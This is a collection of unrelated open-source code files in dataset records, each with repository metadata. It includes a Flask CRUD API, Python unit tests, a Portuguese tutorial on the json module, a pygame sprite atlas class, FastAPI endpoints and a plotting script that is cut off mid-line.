try:\n get_stars = Stars.query.filter_by(id=star_id).first()\n name = request.get_json()[\"name\"]\n age = request.get_json()[\"age\"]\n get_stars.name = name\n get_stars.age = age\n get_stars.update()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True\n })\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"Not found\"\n }), 404\n\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": \"unprocessable\"\n }), 422\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": \"bad request\"\n }), 400\n\n @app.errorhandler(500)\n def bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 500,\n \"message\": \" Internal Server Error\"\n }), 500\n\n @app.errorhandler(AuthError)\n def auth_error(error):\n return jsonify({\n \"success\": False,\n \"error\": error.status_code,\n \"message\": error.error['description']\n }), error.status_code\n\n return app\n\n\napp = create_app()\n", "repo_name": "shaimaaseyam/capastone", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 6643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "models.setup_db", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Planets.query.all", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Planets.query", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.Planets", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.abort", 
"line_number": 47, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "models.Planets", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 71, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Planets.query.filter_by", "line_number": 82, "usage_type": "call"}, {"api_name": "models.Planets.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.Planets", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 90, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 78, "usage_type": "call"}, {"api_name": "models.Planets.query.filter_by", "line_number": 98, "usage_type": "call"}, {"api_name": "models.Planets.query", "line_number": 98, "usage_type": "attribute"}, {"api_name": "models.Planets", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 101, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 109, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 111, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Stars.query.all", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Stars.query", "line_number": 122, "usage_type": "attribute"}, {"api_name": "models.Stars", "line_number": 122, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 136, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 144, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 144, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 145, "usage_type": "name"}, {"api_name": "models.Stars", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 157, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 140, "usage_type": "call"}, {"api_name": "models.Stars.query.filter_by", "line_number": 167, "usage_type": "call"}, {"api_name": "models.Stars.query", "line_number": 167, "usage_type": "attribute"}, {"api_name": "models.Stars", "line_number": 167, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 174, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 176, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 164, "usage_type": 
"call"}, {"api_name": "models.Stars.query.filter_by", "line_number": 185, "usage_type": "call"}, {"api_name": "models.Stars.query", "line_number": 185, "usage_type": "attribute"}, {"api_name": "models.Stars", "line_number": 185, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 186, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 186, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 187, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 195, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 197, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 203, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 219, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 227, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 235, "usage_type": "call"}, {"api_name": "auth.AuthError", "line_number": 233, "usage_type": "argument"}]} +{"seq_id": "13756007653", "text": "import unittest\nimport json\nfrom validators.greaterthan import Greaterthan\n\n\nclass GreaterthanTest(unittest.TestCase):\n\n def _load_test_data(self):\n self.validation = json.loads('{\"condition\": \"greaterthan\",\"value\": \"10\",\"type\": \"error\",\"message\": \"This field should be less than 11\"}')\n\n def test_is_greater_than(self):\n self._load_test_data()\n number = \"11\"\n validator = Greaterthan(self.validation)\n assert validator.is_valid(number) == False\n\n def test_is_less_than(self):\n self._load_test_data()\n number = \"2\"\n validator = Greaterthan(self.validation)\n assert validator.is_valid(number)\n\n def test_is_than_with_decimal(self):\n self._load_test_data()\n number = \"1.0\"\n validator = Greaterthan(self.validation)\n assert validator.is_valid(number)\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "ONSdigital/alpha-eq-survey-runner", "sub_path": "validators/greaterthan_test.py", "file_name": "greaterthan_test.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 9, "usage_type": "call"}, {"api_name": "validators.greaterthan.Greaterthan", "line_number": 14, "usage_type": "call"}, {"api_name": "validators.greaterthan.Greaterthan", "line_number": 20, "usage_type": "call"}, {"api_name": "validators.greaterthan.Greaterthan", "line_number": 26, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "42307662229", "text": "\"\"\"\nJson é basicamente uma estrutura de dados que foi criada para que você transporte\nou salve dados. 
\n\"\"\" \n\"\"\"\nDados que podem ter no Json são bolean, number(int ou float), null(nada), string,\narray (\"[]\") são como se fosse uma lista, e por fim um \"{}\" igual aos objetos(dictionary)\n\"\"\"\n\n\n#Exemplo1 de arquivo json :\n\n\"\"\"\n[\n {\"name\": \"Luiz\", \"lasName\": \"Miranda\", \"age\": \"22\"},\n {\"name\": \"Rafael\", \"lasName\": \"Alves\", \"age\": \"15\"},\n {\"name\": \"João\", \"lasName\": \"Henrique\", \"age\": \"16\"},\n {\"name\": \"Billy\", \"lasName\": \"Paul\", \"age\": \"16\"},\n {\"name\": \"Kayo\", \"lasName\": \"Gabriel\", \"age\": \"17\"}\n]\n\n\"\"\"\n\n# Exemplo2 de arquivo json :\n\n# {\n# \"name\": \"Luiz\", \n# \"lasName\": \"Miranda\", \n# \"age\": \"22\",\n# \"adresses\": [\n# {\"line1\": \"av. brasil\"},\n# {\"line2\": \"av. amapá\"}\n# ]\n# }\n\n\n\n\n\n\nimport json\nimport os\n\n\n# pessoas = [\n# {\n# \"nome\": 'maria',\n# \"sobrenome\": 'santos',\n# \"idade\": 25,\n# \"ativo\": False,\n# \"notas\": ['A', 'A+'],\n# \"telefones\": {\n# \"residencial\": \"00 0000-0000\",\n# \"celular\": \"00 0000-0000\",\n# }\n# },\n# {\n# \"nome\": 'Joana',\n# \"sobrenome\": 'Moreira',\n# \"idade\": 32,\n# \"ativo\": True,\n# \"notas\": ['B', 'A'],\n# \"telefones\": {\n# \"residencial\": \"00 0000-0000\",\n# \"celular\": \"00 0000-0000\",\n# }\n# }, \n# ]\n\n# BASE_DIR = os.path.dirname(__file__) # Criação do caminho completo do arquivo aonde está\n# SAVE_TO = os.path.join(BASE_DIR, 'arquivo-python.json') # Este seria o arquivo\n# # Irá ter o caminho (BASE_DIR) mais o nome do arquivo ^\n\n\n# with open(SAVE_TO, 'w') as file: # File é o nome do arquivo\n# json.dump(pessoas, file, indent=2) # salva o dictionary como json file.\n\n\n# print(json.dumps(pessoas, indent=2))\n\n\n# Carregar de fora para dentro o json___________________________________________________________\n\nBASE_DIR = os.path.dirname(__file__) \nJSON_FILE = os.path.join(BASE_DIR, 'arquivo-python.json') \n\n# with open(JSON_FILE, 'r') as file:\n# pessoas = json.load(file)\n \n# for pessoa in pessoas:\n# print(pessoa['nome'], pessoa['notas'])\n\n\n# with open(JSON_FILE, 'r') as file:\n# pessoas = json.load(file)\n# print(json.dumps(pessoas)) # Converte ele em dumps e o printa.\n\n\njson_string = '''\n[{\"nome\": \"maria\", \"sobrenome\": \"santos\", \"idade\": 25, \"ativo\": false, \"notas\": [\"A\", \"A+\"], \"telefones\": {\"residencial\": \"00 0000-0000\", \"celular\": \"00 0000-0000\"}}, {\"nome\": \"Joana\", \"sobrenome\": \"Moreira\", \"idade\": 32, \"ativo\": true, \"notas\": [\"B\", \"A\"], \"telefones\": {\"residencial\": \"00 0000-0000\", \"celular\": \"00 0000-0000\"}}]\n''' # aqui foi usado para pegar a string\n\npessoas = json.loads(json_string) # Carrega as \"pessoas\" em formato de string\n # ele lê isto, entende, e converte em uma lista python.\n\nfor pessoa in pessoas:\n print(pessoa['nome'])\n# faz o for na lista e pega os dados de voltas\n\n\"\"\"\n load = carrega um arquivo.\n dump = joga para fora.\n json.dump = O dump normal, em um arquivo.\n json.dumps = Seria o dump de uma string, fazendo dump em uma string.\n ident = Formata a string\n\"\"\"", "repo_name": "CidineiPuto/aulaDePython", "sub_path": "aula123.py", "file_name": "aula123.py", "file_ext": "py", "file_size_in_byte": 3124, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.dirname", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.join", 
"line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "40083120995", "text": "import os\nimport copy\nimport pygame\nfrom animation import Animation\nfrom animation import StaticAnimation\nfrom entities.gui.sliced_image import SlicedImage\nimport config\n\n# if rescale is not a factor of 2, sprites will have fuzzy edges that will look terrible with color keying\nassert config.rescale_factor % 2 == 0, \"factor must be a multiple of 2\"\nassert isinstance(config.rescale_factor, int), \"factor must be an int value\"\n\n\nclass SpriteAtlasError(Exception):\n def __init__(self, name):\n super().__init__()\n self.name = name\n\n\nclass SpriteNotFoundError(SpriteAtlasError):\n def __init__(self, sprite_name):\n super().__init__(sprite_name)\n\n\nclass InvalidDimensionsError(SpriteAtlasError):\n def __init__(self, name, rect, wh):\n super().__init__(name)\n self.rect = rect\n self.dimensions = wh\n\n\nclass SpriteAtlas:\n \"\"\"An atlas is a grouped set of surfaces. By itself, it doesn't do much\n more than read the main surface into memory along with a txt file that describes\n the surfaces contained within the atlas. This information can be used to create\n specific Animation instances for later use by calling appropriate methods on the atlas\"\"\"\n def __init__(self, atlas_path=None, tf_use_rescale_factor=True, convert=True):\n # use the descriptor file to load subsurfaces\n self.sprite_rects = {}\n\n if atlas_path is not None and len(atlas_path) > 0:\n # locate atlas descriptor\n basename = os.path.splitext(atlas_path)[0]\n atlas_descriptor = basename + '.txt'\n\n if not os.path.exists(atlas_descriptor) or not os.path.exists(atlas_path):\n raise FileNotFoundError(atlas_descriptor)\n\n self.atlas = pygame.image.load(atlas_path)\n\n if not self.atlas:\n raise FileNotFoundError(atlas_path)\n\n if tf_use_rescale_factor:\n # apply rescaling\n # rescale without resampling\n scaled_size = (self.atlas.get_width() * config.rescale_factor,\n self.atlas.get_height() * config.rescale_factor)\n\n self.atlas = self.atlas \\\n if config.rescale_factor == 1 else pygame.transform.scale(self.atlas, scaled_size)\n\n self.rescale_factor = config.rescale_factor\n else:\n self.rescale_factor = 1\n\n file = open(atlas_descriptor, 'r')\n\n if not file:\n raise FileNotFoundError(atlas_descriptor)\n\n for line in file:\n # of the form: name = left top width height\n name, rect_str = [s.strip() for s in line.split('=')]\n rect = self._get_rect_from_str(rect_str)\n\n # apply rescale factor\n rect.x *= self.rescale_factor\n rect.y *= self.rescale_factor\n rect.width *= self.rescale_factor\n rect.height *= self.rescale_factor\n\n # add sprite to dictionary\n self.sprite_rects[name] = rect\n else:\n self.__sprite_rects = {}\n self.atlas = None\n\n self.animations = {}\n self.statics = {} # statics aren't initialized to anything by default so user can specify color key if wanted\n self.sliced = {}\n\n if convert and self.atlas is not None:\n self.atlas = self.atlas.convert()\n\n @property\n def sprite_names(self):\n return list(self.sprite_rects.keys())\n\n def initialize_animation(self, name, frame_width, frame_height, duration, color_key=None):\n if name in self.animations:\n return self.animations[name]\n\n # grab rect for this name\n if name not in self.sprite_rects:\n raise SpriteNotFoundError(name)\n\n rect = self.sprite_rects[name]\n\n frame_height = frame_height or 
frame_width\n\n if rect.width % frame_width != 0 or rect.height % frame_height != 0:\n raise InvalidDimensionsError(name, rect, (frame_width, frame_height))\n\n frames = [self.atlas.subsurface(\n pygame.Rect(x, y, frame_width, frame_height))\n for y in range(rect.y, rect.y + rect.height, frame_height)\n for x in range(rect.x, rect.x + rect.width, frame_width)]\n\n if color_key is not None:\n # cannot use per-pixel alpha values in this case\n converted = [s.convert() for s in frames]\n frames = converted\n\n for f in frames:\n f.set_colorkey(color_key)\n\n animation = Animation(frames, duration)\n\n self.animations[name] = animation\n\n def initialize_static(self, name, color_key=None, override_width=None, override_height=None):\n rect = self._fetch(name, self.sprite_rects)\n\n if override_width or override_height:\n rect = rect.copy() # don't affect original dimensions\n\n rect.width = override_width or rect.width\n rect.height = override_height or rect.height\n\n assert 0 <= rect.width <= self.atlas.get_width(), \"width out of range\"\n assert 0 <= rect.height <= self.atlas.get_height(), \"height out of range\"\n\n assert 0 <= rect.x <= self.atlas.get_width() - rect.width, \"x position out of range\"\n assert 0 <= rect.y <= self.atlas.get_height() - rect.height, \"y position out of range\"\n\n surf = self.atlas.subsurface(rect)\n\n if color_key is not None:\n surf = surf.convert()\n surf.set_colorkey(color_key)\n\n self.statics[name] = StaticAnimation(surf)\n\n def initialize_static_from_surface(self, name, surf):\n self.statics[name] = StaticAnimation(surf)\n\n def initialize_animation_from_frames(self, name, frames, duration):\n assert len(frames) > 0\n\n self.animations[name] = Animation(frames, duration)\n\n def initialize_slice_from_surface(self, name, surf, dims):\n self.sliced[name] = SlicedImage(surf, dims)\n\n def initialize_slice(self, name, slice_size, color_key=None):\n assert len(slice_size) == 2\n\n if name not in self.sprite_rects:\n raise SpriteNotFoundError(name)\n\n # todo: check for double-initialization?\n\n rect = self.sprite_rects[name]\n slice_img = self.atlas.subsurface(rect)\n\n # this surface must be at LEAST 24 bit or else scaling will fail\n if slice_img.get_bitsize() < 24:\n slice_img = slice_img.convert(24)\n\n if color_key is not None:\n slice_img = slice_img.convert()\n assert slice_img.get_bitsize() >= 24 # just to catch unexpected edge cases\n\n slice_img.set_colorkey(color_key)\n\n self.sliced[name] = SlicedImage(slice_img, slice_size)\n\n def load_static(self, name):\n return copy.copy(self._fetch(name, self.statics))\n\n def load_animation(self, name):\n return copy.copy(self._fetch(name, self.animations))\n\n def load_sliced(self, name):\n return copy.copy(self._fetch(name, self.sliced))\n\n def __add__(self, other):\n assert other is not self, \"adding atlas to itself makes no sense\"\n\n # create a new atlas that combines the two previous atlas\n # in this special case, we want shallow copies because it's likely the two atlases to be added\n # are about to be thrown away\n\n def get_names(an_atlas):\n sprite_names = set()\n\n for li in [an_atlas.sliced, an_atlas.statics, an_atlas.animations, an_atlas.sprite_rects]:\n for key_name in li.keys():\n sprite_names.add(key_name)\n\n return sprite_names\n\n # check for duplicate names and warn if any are found, because it may cause the atlas to choose\n # the wrong sprites\n intersections = get_names(self).intersection(get_names(other))\n\n for inter in intersections:\n print(f\"Warning! 
Two sprites named '{inter}' \"\n f\"in atlases to be combined; consider renaming one of the sprites\")\n\n new_atlas = SpriteAtlas()\n\n for new_d, our_d, other_d in [(new_atlas.sprite_rects, self.sprite_rects, other.sprite_rects),\n (new_atlas.statics, self.statics, other.statics),\n (new_atlas.animations, self.animations, other.animations),\n (new_atlas.sliced, self.sliced, other.sliced)]:\n new_d.update(our_d)\n new_d.update(other_d)\n\n return new_atlas\n\n def scale(self, new_size):\n if new_size is not tuple:\n new_size = (new_size, new_size)\n\n self.atlas = pygame.transform.scale(self.atlas, new_size)\n\n # modify all sprite rects\n old_rects = self.sprite_rects\n self.sprite_rects = {}\n\n # rather than come up with fancy logic to re-create all the sprites, or just to resize them (since that\n # will result in doubling memory use), just assume this will be an operation that happens before any\n # initializing of sprites and warn if it doesn't\n if len(self.statics) > 0 or len(self.animations) > 0 or len(self.sliced) > 0:\n print(\"Warning! Scaling an atlas will result in all initialized sprites being lost\")\n\n self.statics = {}\n self.animations = {}\n self.sliced = {}\n\n for name, rect in old_rects:\n nr = pygame.Rect(rect.x * new_size[0], rect.y * new_size[1],\n rect.width * new_size[0], rect.height * new_size[1])\n self.sprite_rects[name] = nr\n\n @staticmethod\n def _fetch(name, location):\n name = name.strip()\n\n if name not in location:\n print(\"could not find sprite '{}' in atlas\".format(name))\n raise SpriteNotFoundError(name)\n return location[name]\n\n @staticmethod\n def _get_rect_from_str(rect_str):\n r = pygame.Rect(0, 0, 0, 0)\n\n r.left, r.top, r.width, r.height = [int(x) for x in rect_str.split(' ')]\n\n return r\n", "repo_name": "amrazek/386-super-mario", "sub_path": "assets/sprite_atlas.py", "file_name": "sprite_atlas.py", "file_ext": "py", "file_size_in_byte": 10013, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.rescale_factor", "line_number": 10, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 49, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 57, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 58, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 61, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 116, "usage_type": "call"}, {"api_name": "animation.Animation", "line_number": 128, "usage_type": "call"}, {"api_name": "animation.StaticAnimation", "line_number": 153, "usage_type": "call"}, {"api_name": "animation.StaticAnimation", "line_number": 156, "usage_type": "call"}, {"api_name": "animation.Animation", "line_number": 161, "usage_type": 
"call"}, {"api_name": "entities.gui.sliced_image.SlicedImage", "line_number": 164, "usage_type": "call"}, {"api_name": "entities.gui.sliced_image.SlicedImage", "line_number": 187, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 190, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 193, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 196, "usage_type": "call"}, {"api_name": "pygame.transform.scale", "line_number": 237, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 237, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 254, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 269, "usage_type": "call"}]} +{"seq_id": "16864835228", "text": "from typing import Any, List\nfrom unittest import result\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom app import schemas\nfrom app import crud\n\nfrom app.api.dependencies import get_db\n\nrouter = APIRouter()\n\n\n@router.post(\"\",\n response_model=schemas.Message)\ndef refresh_job(\n db: Session = Depends(get_db), \n obj_in = schemas.job_search_service.RefreshJobRequest) -> Any:\n result = crud.job_search_service.refresh_job(db = db, obj_in = obj_in)\n return result\n\n\n@router.post(\"\",\n response_model=schemas.Message)\ndef update_failed(*,\n db: Session = Depends(get_db),\n obj_in: schemas.job_search_service.UpdateFailRequest) -> Any:\n result = crud.job_search_service.update_failed(db = db, obj_in = obj_in)\n return result\n\n\n@router.post(\"\",\n response_model=schemas.Message)\ndef create_metadata(*,\n db: Session = Depends(get_db),\n obj_in: schemas.job_search_service.CreateMetaDataRequest) -> Any:\n\n result = crud.job_search_service.create_metadata(db = db, obj_in = obj_in)\n return result", "repo_name": "prd-tai-nguyen/test", "sub_path": "app/api/v1/endpoints/job_search_service.py", "file_name": "job_search_service.py", "file_ext": "py", "file_size_in_byte": 1200, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.APIRouter", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 18, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 18, "usage_type": "call"}, {"api_name": "app.api.dependencies.get_db", "line_number": 18, "usage_type": "argument"}, {"api_name": "app.schemas.job_search_service", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 19, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 20, "usage_type": "name"}, {"api_name": "app.crud.job_search_service.refresh_job", "line_number": 20, "usage_type": "call"}, {"api_name": "app.crud.job_search_service", "line_number": 20, "usage_type": "attribute"}, {"api_name": "app.crud", "line_number": 20, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 21, "usage_type": "name"}, {"api_name": "app.schemas.Message", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 19, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 27, "usage_type": "name"}, {"api_name": "app.schemas.job_search_service", "line_number": 28, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 28, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 27, "usage_type": 
"call"}, {"api_name": "app.api.dependencies.get_db", "line_number": 27, "usage_type": "argument"}, {"api_name": "unittest.result", "line_number": 29, "usage_type": "name"}, {"api_name": "app.crud.job_search_service.update_failed", "line_number": 29, "usage_type": "call"}, {"api_name": "app.crud.job_search_service", "line_number": 29, "usage_type": "attribute"}, {"api_name": "app.crud", "line_number": 29, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 30, "usage_type": "name"}, {"api_name": "app.schemas.Message", "line_number": 25, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 36, "usage_type": "name"}, {"api_name": "app.schemas.job_search_service", "line_number": 37, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 37, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 36, "usage_type": "call"}, {"api_name": "app.api.dependencies.get_db", "line_number": 36, "usage_type": "argument"}, {"api_name": "unittest.result", "line_number": 39, "usage_type": "name"}, {"api_name": "app.crud.job_search_service.create_metadata", "line_number": 39, "usage_type": "call"}, {"api_name": "app.crud.job_search_service", "line_number": 39, "usage_type": "attribute"}, {"api_name": "app.crud", "line_number": 39, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 40, "usage_type": "name"}, {"api_name": "app.schemas.Message", "line_number": 34, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "9804263156", "text": "import csv\nimport unittest\n\nimport parse\n\nclass TestParse(unittest.TestCase):\n FILES = ['data/inputFile1.csv', 'data/inputFile2.csv', 'data/inputFile3.csv']\n\n def test_parse_row(self):\n for filename in self.FILES:\n with open(filename) as csv_file:\n reader = csv.reader(csv_file)\n for row in reader:\n if row[0]:\n parse.parse_row(row)\n\n def test_parse_csv(self):\n for filename in self.FILES:\n with open(filename) as csv_file:\n parse.parse_csv(csv_file)\n\n def test_idempotent(self):\n for filename in self.FILES:\n with open(filename) as csv_file:\n reader = csv.reader(csv_file)\n for row in reader:\n if row[0]:\n parsed = parse.parse_row(row)\n if isinstance(parsed, parse.HourOut):\n out_row = parsed.to_row()\n parsed2 = parse.parse_row(out_row)\n self.assertEqual(parsed, parsed2)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n\n", "repo_name": "sean-purcell/oec2020", "sub_path": "parse_test.py", "file_name": "parse_test.py", "file_ext": "py", "file_size_in_byte": 1155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 12, "usage_type": "call"}, {"api_name": "parse.parse_row", "line_number": 15, "usage_type": "call"}, {"api_name": "parse.parse_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 25, "usage_type": "call"}, {"api_name": "parse.parse_row", "line_number": 28, "usage_type": "call"}, {"api_name": "parse.HourOut", "line_number": 29, "usage_type": "attribute"}, {"api_name": "parse.parse_row", "line_number": 31, "usage_type": "call"}, {"api_name": "unittest.main", 
"line_number": 38, "usage_type": "call"}]} +{"seq_id": "17129684663", "text": "import numpy as np \r\nimport h5py\r\nimport matplotlib.pyplot as plt \r\nimport argparse\r\nimport pandas as pd \r\nfrom scipy import signal \r\nimport seaborn as sns\r\nfrom IPython.core.debugger import Pdb\r\n\r\nEXPERT_MEAN = 9790.99989735\r\nEXPERT_STD = 1175.06649136\r\n\r\ndef moving_average(inp,window_size):\r\n\tfilt = np.ones((window_size))\r\n\tfilt = filt/len(filt)\r\n\tout = np.convolve(inp, filt, \"same\")\r\n\treturn out\r\n\r\ndef plot_log_file(filename, fields_to_plot, save_dir, use_moving_average, moving_average_window_size):\r\n\tf = h5py.File(filename,'r')\r\n\tlog = f['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tplt.figure()\r\n\thandles=[]\r\n\tfor field in fields_to_plot:\r\n\t\tdata = [log[i][field] for i in range(log.shape[0])]\r\n\t\tif use_moving_average:\r\n\t\t\tdata = moving_average(data, window_size=moving_average_window_size)\r\n\t\ttmp, = plt.plot(data, label=field_names[field])\r\n\t\thandles.append(tmp)\r\n\ttmp, = plt.plot(EXPERT_STD*np.ones((1500,)), label=\"expert\")\r\n\thandles.append(tmp)\r\n\tplt.legend(handles=handles)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+filename.split('/')[-1][:-3]+'.png')\r\n\tplt.show()\r\n\r\ndef plot_log_file_fancy(filename, save_dir, use_moving_average, use_median_filtering, moving_average_window_size):\r\n\tf = h5py.File(filename,'r')\r\n\tlog = f['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfields_to_plot = [field_names[i] for i in [1,3]]\r\n\t\r\n\tmean = [log[i][1] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tmean = moving_average(mean, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tmean = signal.medfilt(mean, window_size)\r\n\t\r\n\tstd = [log[i][3] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tstd = moving_average(std, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tstd = signal.medfilt(std, window_size)\r\n\t\r\n\tplt.figure()\r\n\tplt.plot(mean)\r\n\tplt.fill_between(xrange(mean.shape[0]), [i+j for (i,j) in zip(mean,std)], [i-j for (i,j) in zip(mean,std)], facecolor='b', 